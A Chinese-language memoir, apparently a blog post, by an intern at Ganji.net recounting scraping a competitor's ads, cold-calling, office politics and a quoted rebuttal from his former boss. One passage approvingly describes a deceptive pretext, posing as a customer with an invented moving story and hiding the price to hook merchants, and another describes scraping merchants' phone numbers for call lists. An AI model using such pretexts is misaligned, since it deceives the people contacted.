我的第一项工作是统计竞争对手58的方格业务，当时基本靠数，用手指一个个过去，一个下午就过去了。网灵通是58的另一个付费业务，以标记的形式分散在各个页面之中，一百多页后还有。GL问我，可以把网灵通的数量也弄出来吗？我说可以，我写程序抓~由于我们这边没有代理服务器，只好在1-10的随机间隔内一页页抓网页，然后拿出来正则匹配。保洁频道的很快出来了，GL让我接着抓搬家的，似乎有好几千页。
快8点的时候，刷新错误了，58开始提示输入验证码。突然发现输了也不管用，于是我意识到自己被ban了。一会儿对面做数据的姐姐发现58不能上了。我觉得不妙，到隔了几个办公区的204里找了一个电话销售，让他试试登陆58，也不能上。
整个个公司的IP段都被58同城ban了，我告诉GL，他们很淡定还觉得很好笑……不过正是因为这件事我认识了赶集网产品部的朋友们。
（三）
之后的工作还是数58方格广告数，计算每排、每列的个数，然后乘起来填到Excel表格之中。
数过搬家频道后，我到一楼去买雪糕，回来时看了看屏幕，习惯性地刷新。突然发现方格似乎发生了变化，我不是很确定，继续刷新，结果没有变……等了大概5分钟，再次刷新时发现新的方格出来了。当时很兴奋，好像发现新大陆一样。随后一想，我之前做的统计全部错误了，页面上可见的只是广告位数量并非真实的广告数量。
尝试用反复刷新的方式记录了几次，没有止境，于是打算从网页代码中找结果。常用的标签里没有相应项，在网页的尾部发现了JS代码，这些广告信息出于某种原因是动态生成的，但是所有方格广告的信息都在这长长的一行暴露了。
接下来用php写了一个脚本来抓取方格的实际数量，商户名和商户电话。在搬家频道中，一个时间点上的广告数为25和广告位数相等，但是实际广告数却大于70个。
我继续刷新，开始研究58方格的变化规律，发现58做了蛇形方向轮播，让每个广告按时间段出现在每一个广告位上并且经过每个时间间隔，会消失一个广告并且出现一个新广告。我向市场部的人要了竞品数量统计，发现几个月以来，他们提供的数据一直有误，比方说搬家频道，总是25个。这意味着，我们对58产品的了解是片面的，而且错误估算了对方的盈利额，也在参考对方业务的过程中，限制了自身产品的市场潜力。
和GL讲了这件事，他起初不相信，非要让我演示一遍。后来，他亲眼看到之后，无语了很半天，然后是烦躁。第二天，YT和三个业务部的负责人知道了这件事，反应很大，之后是他们无止境的会议。
销售部接下来采取了动作，重新定位竞争对手，重新对产品进行定价；考虑是否改变现有产品的广告位或者采取轮播；改变电话销售的流程。
经常和北交的SGY到汉王吃午餐（自助但是管理费很扯），有一天他带我去拼餐，吃素菜。十多个人力几乎全部是技术和产品部的，一开始感觉有些拘束。他们吃饭时谈到了那次58 全面ban 了赶集网，我说是我干的，大家很快就聊熟了，几个前辈也分享了自己眼中的商业产品设计。
赶集网负责数据挖掘的YJ先生，至始至终对我很关心。饭后，他给我介绍了服务器管理常识，传给我一些技术PPT，也向我推荐了一些数据挖掘方面牛人的微博。
几天后，打开内部邮箱，看到了一封YJ先生CC给我的邮件。这次讨论是关于公司文化的，产品部沸腾了。
选择部分邮件内容粘在下面。（人名已经屏蔽）
———————————————————————————————————————————————
答复: 爱拼赢不了，拼到底才能赢
销售运营部门有位刚来的小朋友，叫CLX。
他思路开阔，动手能力强，前几天一同午饭时，他的分析和沟通，得到了在座同事一致褒扬。
除了本职，小曹能主动分析竞争对手与咱们的业务数据从而算出与竞争对手的差额，并进而提出模式改进建议。（部分可参考邮件附件。需要进一步了解可找我，或直接联系小曹）
提到这位同学，没别的意思，只是觉得一位未正式踏入职业生涯的小同学身上，有不少职业人能够学习的地方。
有下面几点，供参考。
1.为自己工作
理论上说，工作只是一种契约，倘若只将工作看成付出劳动获得报酬，那么人与工具无异。在赶集网，爱上自己的工作，为自己工作，才能获取比物质大的多的收益。将工作看成是为自己工作，是一种主动，也是一种快乐。不需要打卡考勤，绝不是一种可钻的空子，人在做天在看，为美好打拼的意义远超懒惰与贪便宜的小快感。
2.以结果为导向
任何工作活动，都要有结果，要清晰的知道目标和目的，得有实现结果的”势利眼”。为实现目标，谁都可以随时站到全局看问题，技术人员可以站在商务角度考虑问题，产品也可以了解一定的技术思路，这些方式、技术、工具、能力，都只是手段，甚至都不是最重要的，最重要的是随时知道想要的结果是什么，知道大家共同的目标是什么。
不该以”苦劳″来论成绩， BUG 百出的代码，看似忙碌，实则是一种破坏；冗长的会议也不好玩，没有结果的会谈任何人都该随时中止。
3.共生而不是惰化
一个人做不成任何事情，甚至都生存不了，人只有与组织共生。但组织大了常会有个体的依赖， 1+1<2 ，甚至 <1 ，最后整个组织都烂掉。我们不需要组织性惰化，我们需要每个人都时刻警醒：自己是否为别人提供了有价值的付出，自己是否帮助到了团队同事；自己是否变懒了，自己是否在抱怨各种所谓的不公。
4.挖掘自身的价值
每个人都有别人不及的价值，我们在工作中都需要千方百计的把自身这些独特的价值挖掘出来，不用拘泥于现有思路，更不用局限于已有的经验。要敢做，要尝试不同的方式，同时也要尊重自己以外的每一个团队成员的价值。每个人都这样做，才能整体而全面的超越对手。
以上几点，不知道能否可以立即转化为可操作的方法，但我们在价值观高度趋同的大前提下，在战略大目标异常清晰的前提下，最重要的是落地 ！
每个人都知道自己做什么，每个人都知道怎么做，这个组织的力量将是最强大的。各位同学，共勉！  
YJ
发件人:XXX[mailto:xxx@ganji.com]
发送时间:2011 年4 月18 日 21:31
收件人:’ xx’; ‘ttt’; ‘yyy’; ‘ 产品部门邮件组’; ‘mobile.all’; ‘pm’
主题:答复: 爱拼赢不了，拼到底才能赢
老实说， 如果我们都拼了， 即使被对手甩开了， 我们不会有遗憾。 如果我们没拼， 即使赢了， 和我们没关系， 我们会欠那些天天在公司打拼的人一个永远也无法偿还的人情。更何况， 不去拼搏， 还能赢。 这样的事情有谁听说过？
对我们现在来说， 最可怕的事情就是我们会逐渐变得平庸。 而一家公司，或者一个团队的激情被消磨为平庸时，就不是某个人或者某件事情就能挽救的。
所以， 我们千万不要变得平庸！ 要用燃烧生命的态度去拼！ 去让我们变得不平凡。
主题:答复: 爱拼赢不了，拼到底才能赢
让我来挑明吧:
今年和明年是我们与竞争对手殊死搏斗的两年, 如果这两年内我们没有抛开对手 或者被对手甩开了, 那我们现在做的所有事情将毫无意义!
可能我们从春节过年以后, 看着我们市场推广了, 看着我们品牌知名度提高了, 看着我们的PV/UV 上升了, 心里沾沾自喜; 但是咱们自己问问, 这些事情和我们为之做出的努力有一毛钱的关系吗  我们有什么可喜的  如果产品和技术上面没有足够的优势, 市场和销售如何去利用优势打客户  让他们只能求爷爷告奶奶   那叫乞食! 换我们自己上, 你愿意干吗 
请大家严格要求自己, 从我做起, 坚持做好自己手里的每件事情; 坚守自己给出的承诺; 坚持维护技术部乃至产品部的尊严!让我们的名字留在赶集辉煌的旗帜上, 而不是写在某个默默无闻的墓碑上!
人生难得几回搏, 可堪回首的牛逼能有几回  一个大好的机会我们没有发力为之去奋斗的话, 我们一定会遗憾终生的 ! 为了不遗憾, 为了今后向自己的儿子吹牛: 你老子当初也在赶集奋斗过!. 兄弟们, 加油吧!
———————————————————————————————————————————————
到这里收尾吧。
（四）
赶集网团购频道上线时间不长，在浏览其他频道的时候偶尔也会看看赶集网的团购频道。假期里有看过一些团购平台的定性分析，于是我打算从赶集网团购频道入手尝试一下定量分析。
首先建立了电子表格，最开始只有团购名称、日期、原价、现价、交易数量、单位让利、交易额几个项。翻阅往期团购，很快就可以得到这些数据和信息。
对团购而言交易数量和交易额这两个指标很重要。交易数量可以从一定程度上反映平台被关注、交易被达成的程度；交易额是平台上一个单子实际产生的效用：按照团购规则，平台商可以从交易额中提成，同时交易在达成之前，平台账户上每天会有现金流入。支付宝牛叉的一个原因就是在用户确定付款之前，这些钱都停留在这个平台账户之上（上次淘宝宣讲时提到每天进账8亿，比整个香港岛还多些），这段时间内他们可以拿这些钱做很多事。
总结赶集网往期的11个单子，发现效果很差，除了做简单的排序，我得不到什么实质性结论，顺便就把58团购3月份所有的往期团购数据手动搞了下来（100多个单子），很多单子交易数量或者交易额很大，理所当然滴很快我很快在这些数据中迷失了。
突破口是两个表项的加入，“细分市场”和“类型”。细分市场大致包括情侣（夫妻算入其中）、女性、男性、儿童、老人、无针对性；类型没有划分范围，基本上是直接定义，如摄影.婚纱。
再对表格按照交易额排序，我发现了一些规律：针对情侣、女性、儿童（不要频繁使用）的单子一般而言可以获得较好的交易数量和交易额；无针对性的单子，效果无法预估；针对男性消费者的单子结果不会很理想。（截图是58团购平台三月份按交易额及交易数量降序排序的TOP10）。
记得一个理念，通过数据还原业务。对比58团购平台这个市场的早期进入者，我们存在诸多差距，我认为追求同质化然后再追求差异性是一种较佳的发展方式，也就是他们有的我们必须都有，相同业务要和他们做得一样好，然后再考虑产品特色。不知道58是否用这个规律作为一个选择合作商家的标准，但是我们可以利用这个规律来为自己的平台服务，这样每一天的团购广告位可以得到更充分利用，也更好地实现“双赢”。
用这个规律去看我们往期做过的单子，可以对“效果极差”做一个很好的解释；试着预测了一下当天“男性全面体检”的单子（男性向），数据出来时果真很糟。
除此之外，发现了另外一些规律。利用免费、秒杀这种手段可以吸引众多点击，提高平台热度，同时在一段时间之内，秒杀会促进相关类型单子的交易数量的提高。58做过一个“巴厘岛的双人免费游” 的秒杀，带来了312328的点击量，在交易的有效期内，相关单子交易数量也借势提升，就连到“十渡双人游”这种单子也跟着虎了起来。“秒杀”现象可以参照拉手、糯米、高鹏往期的单子，特别是“0元iphone4”。
利用节事展开营销是另外一种手段。为分析效果，我又加入了特殊标记和考察点这两个选项。特殊标记用于标记“妇女节”、“白色情人节”这些事件；考察点作为一个时间段，跟踪从标记点发起的所有团购。58团购在3月8号开始推出免费抽取针对女性的时尚音乐手机，效果一般，但是缺乏一段时间内的跟进。如果我是搞市场的，会在妇女节后连续做手机和针对女性的团购活动，因为这些用户会连续地登录，看看自己是否秒到了手机，也会看看这些我们有意用于吸引他们的“新团购”。
GL说团购平台和销售部无关，但是我觉得有必要去找找负责团购的人。在另一间办公室里，找到了负责团购的YF（北京人），花了一个小时和他交流，他表示很赞同。几天之后听说他们给大Boss交了一份报告，说是找到了团购平台的瓶颈并且建立了一种新的工作方式，并被表扬了一番。
有一天偶遇，被YF拉到了办公室。他给我展示了很多折线、饼状图，告诉我现在每天业绩上去很多，这种有针对性筛选商家的方法很赞。YF是手动输入的，连夜记录了58团购一、二月份的交易，现在想了解下拉手和糯米的情况。我觉得帮人还是帮到底为好，花了几天写了一个脚本，这样可以很快把所有往期团购都抓出来（规律仍然适用），这个程序的第一版使用网页输出，第二版直接输出Excel表格，为他们节省很多时间。
离开赶集网后，YF还经常联系我。
我意识到技术的重要性，成为技术上的大牛可望不可即，可以应用技术解决我们每天遇到的实际问题就可以了。
（五）
新的一周里，经历了产品的重定价过程，这一周开始，我们运营组的几个人搬到了总监室。营销调研和营销情报是营销信息系统的两个重要部分。我们手上掌握了自己的月点击总量和销售额，还有竞争对手58同城的一些数据。
这个过程只能在一旁听和学习，主要是GL比划、YT提意见。GL提出了他的观点，根据数据统计，58与赶集网月流量基本相同，也就意味着我们开始平分市场了；这时58的广告总数*58的广告价格与赶集网此两项的乘积比值应该为1，我们一直少估计了竞争对手的广告总量，所以要考虑提价（我不赞同比值为1这个假设）。
GL写出了一个公式，有一项是两家公司广告数量的比值，由于相似产品的相对位置不同，所以要引入相关系数（赞同），具体这个系数是多少不得而知。GL一拍脑袋说0.7，YT和我们都表示不认同。0.7是一个心智模型推算出主观概率，不说明问题，有一些可参考可行的解决方案，比如局部试验、记录用户的鼠标轨迹、眼动实验。
按照GL的估算，我们在广告位不采取轮播的情况下要在“精品”这个产品上提价3倍，一个季度超过1W，他自己也觉得不可行，也没有商家愿意出这个价格。
这件事具体怎么了结的，我不清楚也没有权限了解，经历了一次真实的产品定价过程却是宝贵的。
第二天中午天阴，灰蒙蒙的。我和光耀一起去吃饭，路过信威通信看到停车扯有人在厮打，一看是GL，被保安踹倒了。我们前去拉架，光耀差一点打了起来，我被拉扯了好几下。看着保安越来越多，我报了110，光耀去接车。
GL头和手被打伤了，两边还是不依不饶。起因是GL他们计划开车去呷哺呷哺，停车不太符合规范，两边人都嘴欠，GL肝火一旺就上去了。看到自己Boss被打感觉很不好。
110一到，保安开始扯谎，说我们都打他了，四个人动手。公安问他的头头是什么安保公司，头头说不知道，不认账。于是我们被一起带到了上地派出所。得饶人处且饶人，事情能解决就好。保安假寐了一会儿开始和他姐姐打电话，说是2个人打了他。一会儿民警来了，他又说3个人打他，4、3、2来了一遍，我容忍不了这种性口雌黄。
调解中，我们都登记了身份证号码。主要是GL和保安，他们被带到了审讯室里，民警让他们和解，和解不了分别拘留15天。我和几个主管在外面等着，一个打工的人进来了，一个民警指着就骂：就你丫这傻样，谁打你你都不知道，别呆北京了，滚回老家去。这句话让我不爽了好几天，记得格格唱过“北京北京，不是我们的家”。
一直到2点，GL还饿着，我去给他买饺子和鲜橙多。一到门口，民警说只能带真空食品，饺子里会藏东西，我直接求他了，没有作用。。。GL好像妥协了，自己被打了还答应付医药费给别人。PXX在外面坚决不同意，说是要是在哈尔滨，那个保安绝对悲剧了。大家决定让我进去调解，民警答应了，进审讯室前看了看我的身份证，他说，90年的出来混这些年也不容易（我很无语），进去就事论事，不要威胁别人，然后把我的身份证号和保安的互换了，交代我们如果相互看不惯，不服可以去起诉对方，记住了吗（我很无语）？
我听保安把事情讲完了，试图让他们相互道歉，毕竟把事情闹大不好。我说您下午还要看停车场，我们还要工作，大家低头不见抬头见，搞僵了不好。后来时间一到我被民警拉了出来，不一会儿他们答应和解了。
我们到对面餐馆吃饭，GL被打得只能喝汤了，吃完饭冷不防指着我一句：“就你这王八蛋，谁叫你报警了”~
大家很是关心他，买了双氧水、纱布和棉球~
回到赶集，开始重度心烦+郁闷。上人人看了姑娘的主页，翻到了她很久以前的一篇日志，有一副插图。
一年前，大二时到宏福校区给学弟、学妹讲Java时用过这幅图，这是一个巧合，很快有些惬意了。
回到寝室，快11点了。飞信上姑娘说想去北川做茶叶，可能要休学一年。我知道劝也没有用，于是索性就说了，如果这是她的决定，我尊重，我也休学。她问我明知道是坑也跳吗，我说跳，虽然觉得这件事成不了，但是我有责任去和她一起承担。
今年三月在北师认识了姑娘，第一次觉得那么在乎一个人，我也不知道这种在乎对于没有恋爱过的我意味着什么，姑娘是北京的，我是南京的，想想会感觉到很无助……
路过知春路时，看到一本盗版书——《女人挖坑男人跳》，自嘲地笑了。这一周里，情绪低落，基本垮了。
在西二旗打车，司机问我怎么不开心，我倾诉了一下，陌生人没有什么好防备的。他说，我太学气，不是当你什么都有时，别人才会和你在一起，你要接受现在的你。我们到了五道口，请他吃饭，吃过后，他非要付账，然后把我送回了北邮，不要我的车费。突然很感动，在陌生的城市里，不认识的人也是哥们。
（六）
四月中旬，GL把我们几个运营组的人召集起来开了一次会。会议的主要内容是探讨如何优化各个流程。他问问题，然后在白板上画各种图（围绕ARPU），能答上问题的只有DX姐姐，术语很多。
GL 说如果我们能建立一个成功的运营体系，以后就是前人栽树后人乘凉了。我负责电话销售优化这一块。GL谈到了各种影响因素，比如培训部的各项工作。我认为应该从培训入手了解情况，原因有以下两点：第一，培训的人从来没有做过具体的销售工作，他们制作了很多PPT，总结了很多话术技巧，我质疑这些材料的价值；第二，如果一个业绩糟糕的电话销售在被点名接受培训后，进步巨大，无法对的进步归因——是培训的结果，还是自我驱动的结果。当时有一个想法，让培训部的所有人去做一段时间电话销售，合格后方可以继续工作，但又觉得这件事不靠谱，会得罪很多人。
我决定从售前、售中、售后三个环节去寻找电话销售改进的可能性。下班前问GL他是否做过电话销售，他说没有。我们到了华夏楼下，我告诉他，我想试试，我自己不去打电话找不到问题解决的方法。GL很高兴，他说如果我想回百度，他可以推荐我回去，我不知道是不是测试忠诚度，我说我会好好坚持下去。
回到办公室，GL把我分给了服务部的负责人SF姐姐，然后SF把我调到了YHN阿姨的组中，这个组全部是新人。GL说，你要给我们争脸，我觉得我是去解决问题的似乎和争脸无关。
当天晚上在知春路买了一本《销售圣经》，然后构思了一晚上我该怎么打电话。其实内心里很排斥销售，总觉得销售和贿赂、饭局、声色场所挂钩。
第二天早上，SF姐姐帮我借了一个接听器让我听别人打电话。第一个姐们很悲剧，我一接外呼，她那边就没有声音，于是换了一个哥们继续听，顺便把他讲的话记下来。不幸的是，他联系的都是意向客户，彼此认识了。开场是自我介绍，然后各种哥、嫂子叫个不停。
对方拒绝的理由也很简单，要么是不在北京（注意，号码是北京的座机O(∩_∩)O），要么是自己做不了主要问他娘子。总体感觉客户几乎是互联网盲，他们总是跟不上电话销售的节奏，还有很多人不认识赶集网，于是乎各种“赶集网老虎了”的话就出来了。
有一点点心动的客户就和他们约时间和地点，那个哥们做事不够干脆，不把时间约在时间点上而是在时间段上，而且没有从客户的角度考虑，总是说自己的时间安排而不是将就别人。
我排斥叫哥、叫嫂子这种做法，决定不使用这种策略。中午时，SF姐姐问我收获如何，我说有一些，我让她下午让我打电话，我计划打45个，15个一组。
开始打电话时，发现没有客户资料，得自己去58同城、百度、简单网找。这是售前搜集资料的问题，大家盲目找很制约效率，而且面对的是相同的资源：一个电话这个人打完另一个再打的现象会经常发生。如果一天接到赶集网的5个不同的人打来的电话，客户会很崩溃，要么后果很严重，要么就是“求求你，别打了，我给赶集网付费还不行吗？”。但事实上第一种事件可能性最大，第二种会在百度这样的公司里频发。
打电话前需要把客户号码粘贴到一个浮动窗中，按下绿色按钮后，CRM系统会自动连接，同时录音开始。我决定打搬家这个行业，头15个电话全部悲剧，特别是提到赶集网以后。礼貌的人会说，我在外面，我没时间；不礼貌的人骂去你妈的，或者把电话直接挂掉。被别人挂电话，是一件非常不爽的事情，我发现昨天晚上准备的策略和构思完全没有作用。
第二组仍然悲剧，我决定换一种方式。自报家门相当于告诉客户你要向我交钱，我为何不换一种身份呢？我可以先扮演他的客户，然后再逐步转换身份。这种方式取得一定成果，终于达到了一个意向客户的标准，与此同时我发现一个另外的问题，客户对报价很敏感：有几次基本上钩了，我一报价，他就挂电话，于是我决定在最后一组中隐瞒报价，直接约见见面时间和地点。
我构建了一个情景，而且这个情景很适用——我告诉对方（搬家公司的老板），我住在马甸桥现在想搬到罗庄西里的大月园，现在在6楼，要搬到1楼去。家里有一台星海钢琴，以前搬家时被钢琴被搬家公司摔坏一个脚，所以很在意也很质疑他们的能力。
这样开场后，老板会花很长时间介绍他的“专业团队”，然后向你各种保证。我会接着问他们的车辆（是金杯还是开车），让他们安排路线和计划。当你和客户能连续聊5分钟左右，这时你就可以改变话题了，他们一般不会骂去你妈的或者挂你电话了（2次例外）。
然后我开始介绍赶集网的各种产品，他也不好意思拒绝。最后他开始问报价，我告诉他我也不太清楚公司的内部的定价，但是价格他们可以承受，而且这是一个利用网络开展营销的绝佳机会。最后是约时间和地点，一般直接约到赶集网，如果对方不方便可以约到他的店铺或者工地，接下来的事情就可以交给产品的人了。 PS：很奇怪他们最后对我要搬家这件事不感兴趣了。
最后一组我打成了11个意向电话。单组战绩是11/15，加上前面的2组，综合战绩是12/45。我问了SF姐姐，这几百个人里，最狠的能在100个电话里达成几个意向客户。她看了一会儿统计，告诉我7、8个，你可以试试，我算了一下我至少可以打30个。
晚上YHN组开了一个小会会，她宁报了一下我的数字，然后十几个人起来拍手，当时很飘然。之后他们调了我的电话录音，感觉特别别扭，前面像童声后面像鸭子。
（七）
CRM不仅仅是一个软件、一个系统，而是一项重要的职能——维护和管理可持续盈利客户。
赶集网CRM系统主要是记录客户资料，记录内部电话销售录音这些信息。其中客户又分为新录入客户、意向客户和流失客户（流失客户统一放到公海）。每个电话销售新成功录入的客户会被保护起来，其他人不可以再次录入；电话销售也有权利把自己的客户放到公海中并且从公海中抓取别人流失客户。
售前寻找客户这个阶段存在很多问题和盲目性，许多行业存在天花板（保洁、驾校行业牛叉的公司就这么几家）。解放电话销售并提高他们的效率，应该建立一个自动抓取和过滤客户信息的系统，或者让专门的人从事信息的收集、录入工作。第一种方式需要花费大量的开发成本，第二种方式忽略了每个人的主观感受：首先挑选客户需要一定经验，销售的工资由底薪+提成构成，很少有人愿意专门从事收集客户资料的工作。
以电话数衡量为指标规定电话销售的工作量，不是很合理。从4月份新签客户的记录中，我得到了客户电话，详细查看和收听了针对该客户的每一次呼叫（可能由不同的电话销售完成）。其中一些电话，在这里不妨称作关键电话（客户的态度发生了根本改变），时长基本超过6分钟：较电话量这个标准，单次电话通话时长这个指标更为重要。这个意见及时和GL做了沟通。
我们做了一个实验，抓取了58同城各个频道方格广告的客户资料（这些客户的支付能力较强），然后让一个组的人集中打这些电话，效果明显要好很多，这个实验说明优化客户资料的重要性，恰当的优化和正确的筛选标准可以从质上提高电话销售的工作效率。
赶集网在4月份开始进行电面分离的尝试。也就是改变电话销售的职责，电话销售只负责寻找意向客户，不用介入签单；专门的人——面销，负责约见客户并签单。这个计划看起来很好，更像流水线的工作方式，但是忽略了员工的个人感受。
工作中发现一个现象，两个实验组的电话销售，情绪不佳，绩效也不是很好。一些人直接从电话销售变为了面销，一些人电面结合（这些人引起了组内敌视），还有一些人只做电话销售。
之后我决定针对CRM系统的改进和电面分离这两个问题做了一次对两个实验组的20几个电话销售的分时段面谈。
面谈的结果中有许多不一致性，主管和各个电话销售的意见极不统一。在主管看来，电面分离是好的，应该拥护（他们的工资结构与销售不同）；就销售看来，电面分离严重挫伤了工作的积极性和目的性。电销和面销之间的交流衔接存在差异，导致了信息的不对等。以客户的角度考虑，交易的一方始终在变换会带来极大的不安全感。对于CRM，大家都反应了他的臃肿和低智能化。
我和GL汇报了结果。在电面分离这件事上他的意见是：电话销售们挑三拣四，下个月压死他们或者让他们滚蛋。这个意见我不接受，我认为一个公司里员工满意度这个指标是很重要的，与员工工作的绩效和面对客户的态度正相关；在CRM上，我提出了一些改进方法，我们必须建立一种防止客户被反复骚扰的机制，一方面节约电话成本，一方面不至于一次就把客户打死。
GL把我带到了楼下，这一次是说我想得到的太多了，让我先耕好自己的一亩三分地再说。他反复提了功高盖主这件事，还援引了一些他的经历，我隐约感觉到事情会向不好的方向发展了。
第二天继续了解各个组的主管对CRM系统改进的意见，到ZY组时，我说了一下自己的想法。他说，昨天GL已经和他聊过了，是不是GL也和我讲了。。。当时很无奈，自己说过的话做过的事变成别人的，这种事经历过好几次了。
（八）
故事的结尾，似乎总会有一个唯美的结局。我却在经历一个个悲剧，总是不堪一击；总是觉得自己从一道光变成一个点，点的墨迹逐渐模糊、模糊，然后消失。
最后一项工作是从服务部转到招聘部，继续去监控电话销售的绩效。还是一样的问题：销售们盲目地渗透智联招聘、51job、中华英才、58同城的客户，这种做法是饮鸩止渴。
周四不情愿地翘了数据库的实验，一大早到大钟寺搭上了地铁。突然觉得一种不协调，在人群中穿梭，看着上班族们在屏蔽门打开后的一瞬间飞奔出来……
我是一个挺顽固，可以变态到吃一个学期酱香鸡腿饭的人。现在却逐渐开始厌恶我的工作——眼睁睁地看着一件事被别人越做越烂却无能为力。
周五，在地铁上看到了58同城广告（杨幂），连忙用手机拍了下来，然后开始记录广告的间隔，高广告投入必然带动产品全线溢价。以赶集网的“精品”为例，年后大规模广告轰炸后定价从2000左右，一直冲到了3000+。
非新闻时段，58同城的广告间隔差不多是34秒，单日广告投入在赶集网之上（地铁、公交等）。广告作为一种价值沟通的手段，可以扩大品牌的知晓程度，广告文案从很大程度上觉定了品牌在消费者心目中的定位。“赶集网，啥都有”和“不找中介找房子，不花钱招人才，一折吃喝玩乐，闲置物品能换钱”这两个文案对比起来高下立判。
有人说，58的文案很烂，直接得罪了中介、招聘网站，但互联网争夺的是用户的心智资源，这是一个用户为王的时代。说道租房子我或许会直接想到58同城，但是一定不会想到赶集网，“赶集网啥都有”只是一个杂货铺。
我尝试计算了一下58同城广告的涨幅，仅使用广告频率和赶集网的平均涨幅这两个数据。假设，我从公交和地铁这两个渠道统计的曝光频率代表了58同城所有广告的曝光频率；又假设58在定价时会充分参考赶集网的单位定价涨幅。这两个假设都很极端，但是我可以大致锁定一个范围。比方说58方格广告：广告前 2400，广告后可能会落在“3300-3600”这个区间内。
再一次找到了GL，这一次又被他叫了下去。GL说，这是杞人忧天，赶集网做到现在了，死不掉了，市场会让他活下去，即使公司内部还是一个烂摊子。
周五晚上，在新浪微博闲逛，到了雷军同学的主页。随意发了一个私信，没想到回信了，他说现在暂时不投资其他项目，向我推荐了一个他的师弟LHB，这个人也是天使投资。周六和LHB先生邮件，奇迹般获得了面谈的机会，然后就大家投入到了商业计划书的修改之中。
此后一周没有到赶集网，周一有请过假，GL说他知道了。周四进入最后排演，然后通宵。当时觉得被鄙视的可能性很大，但是我们得认真做，哪怕只有1%。
周五一早完全恍惚，我和LC一早从北邮出发，到清华大学找ZX，一般吃午饭一边排演，另一头ZS还在北师紧张地统稿。
最后还是被LHB“鄙视”了，理由很简单——三个大三和一个大二的孩子。
第二天GL把我也鄙视了。
新的一周我到赶集网办理离职，在两个办公地折腾了三次，意外的知道了58方格的新定价——接近3500。
后来和产品部的XT姐姐和KS前辈聊了很长时间。事后才知道，在运营中心这段时间，产品这边和GL要过几次人。
离开公司后，商业产品总监XJ姐姐给我打了电话，问问了大致的规划，以及是否换一个部门。很感激大家给我的机会，尤其知道了XJ姐姐也曾是北邮人以后。但是我需要一段时间去调整自己，感觉到了现在还在迷失。
感谢没有见过面的CYY姐姐对我的评价。
感谢赶集网的大家，GL、YT，产品部所有前辈，光耀学长以及素菜团的大黄、YJ。
就在这里结束吧，谢谢大家。
还能再负责一点？
本文只写为写给我的哥们，我曾经或现在共同奋斗过的同事，我见过或者没有见过的圈内朋友。其余一切人等请自动忽略，不接受任何评价及转载。http://www.alibuybuy.com/posts/62238.html
连续两天，一封实习生在公司的经历完全打乱了我的正常工作甚至生活，我的手机、QQ、MSN、微博完全成为了热线，先后回答同样类似的问题过百次。承受着同事异样的眼光，甚至连生活中部分熟悉的，一些不熟悉的朋友都对我的人品产生了很大的质疑。因为我不想再做同一件没有意义且浪费时间的事情，我也不想一次又一次的去澄清很多东西，写出来，所有朋友看看即可，多的不用议论。只有一个目的——凡是认识我的人，和我目前还一起共事的人，你们完全不必去怀疑我的能力、人品以及职业操守。
为了方便的叙述，下面直接开始我和你的人称对白。
某同学，看来你忘记了很多事情的真相，那么由我来帮你回忆一下。
答你的连载一
我对你的第一次面试持续了一个小时，你可以问问部门内所有你认识的人，我的面试哪一次有超过20分钟，我所关注的一定是关键点，了解即可，其他不会多问。为什么对你特殊？因为我发现了你的潜力以及你很强的信念，对自己的要求以及对成功的渴望。但你必须清楚，你具备的不是实力，仅仅是潜力，而且后续的事情证明，你的心计之深，城府之重，完全不是你这个年龄的人应该有的，而且没有用到正道上。可即便这样，我出于个人情感，依然很喜欢你，如同第一次面试见到你时一样，仅仅是因为你和大学时代的我太像了，这是我对你说的原话：“想法是不值一分钱得，他可以是很多个零，但是必须有团队及执行力撑起前边的1，否则没有任何意义，你缺乏的是行业的尝试，对市场的把握，对用户的判断，这个没有人能教你，必须经过至少3年的洗礼，但是我希望你快一点，因为我们这样的人经不起青春的浪费。我像你这么大的时候失败的结束了自己的第一个公司，但是我获得了很多经验，你这个年龄就像一个没有吸水的海绵，需要的是野蛮成长，对自己负责”基于这个，虽然初面我就已经确定你不是我需要的人，但是我却不希望你大老远白来一次，对你普及了很多行业常识以及思维方式，而且全都是我错过、失败过、成功过的血泪经历总结的精髓。就这一点来看，我应该是你对互联网这个行业的启蒙老师，一点都不过分。
我还记得你二面的原话：“和我聊过之后，你对其他的公司再没有任何想法，你只想跟着我干，以后我去哪里，你去哪里，我让你做什么你就做什么。”那么试问，如果我是一个如你描写如此不堪的人，以你的智慧，何必如此？又怎可能如此？
你是怎么获得二面以及进公司的机会？如你所说，是你那种精神，对一件事情的执着，又出奇巧合的与我相似，所以没有你这个level的名额我争取，没有你这种事情的先例我特批。若不是如此，公司领导谁会知道你做的这些事情？你提出过的所有要求我全都答应了，甚至在进公司的初期，我放任你去了解各个方面的业务，为你讲解任何与我所负责的业务有关的或无关的东西，一些我擅长的或者我比你擅长的相关岗位关键点。因为对你的负责，我不得不替未经世事的你规划着最适合你的路线，一条不以我的需要为前提，最适合你发展的职业道路。我一直在为你走产品线或运营线而纠结，并且与你非常深刻的聊过，你是否还记得？
答你的连载二
这件事你做的很棒，是你在公司的几个月完成的我下达的任务最接近成功的一次，但是你半途而废了，并没有在我们规定好的时间点给我一个结论性的结果，此事不了了之。这与你一直标榜的以结果为导向大相径庭，并且甚至这句话都是我反复对你强调的你必须具备的职业素养。这是你的第一次考验，我对你打60分，因为你没有做好一个下属应该做的事情，凡是都得有个结果，无论是成功的，或是失败的。一件事，我们把它做不好还做不坏吗？我们把它做死了还不能知道一些经验吗？知道了这些经验，我们从头来过，又有什么呢？但是这个结果是最重要的，结果就是你获取的经验，这也是我对你讲的。可让我非常失望的是——这之后给你的每一次机会，你非但再没有如此接近一个结果，最让我恼火的是你甚至可以泰然如山的告诉我没做。
答你的连载三
你受到褒奖这件事情因为什么我不知道，但是我觉得你做的那份我需要知道结果的事情非常糟糕。也许你做了什么我不知道的事情真的很优秀，只可惜和我所需要的优秀没有关系，我是一个职业人，我需要的是我们团队的工作有一个结果。其他团队的事情，自有其他团队的负责人应该去做好，这与我的责任没有关系，并且我也是血肉之躯，精力非常有限，如果你做的事情真如你所讲的那么棒；如果你所获得的好评是真正应该给予你的，我非常的开心，祝贺你。
答你的连载四
你也许最引以为傲拿出来炫耀的就是你做的团购业务分析，也许你忘记了整个思路及分析过程都是我手把手，对着很多个团购网站讲给你的，但是我依然觉得难过，我为这个事情付出了相当多的时间，可你只记得形式，完全忘记了本质。
为什么？
